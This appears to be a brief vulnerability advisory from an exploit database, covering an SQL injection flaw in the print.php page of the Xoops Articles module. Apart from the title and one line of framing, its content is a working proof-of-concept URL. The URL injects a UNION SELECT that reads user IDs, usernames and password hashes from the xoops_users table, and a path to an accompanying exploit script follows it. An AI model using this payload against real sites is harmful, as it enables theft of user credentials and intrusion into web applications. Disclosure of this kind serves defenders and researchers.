Xoops Articles Module Print.PHP SQL Injection Vulnerability

Xoops Articles Module Print.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof of concept and exploit code are available:

http://www.example.com/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

/data/vulnerabilities/exploits/23160.pl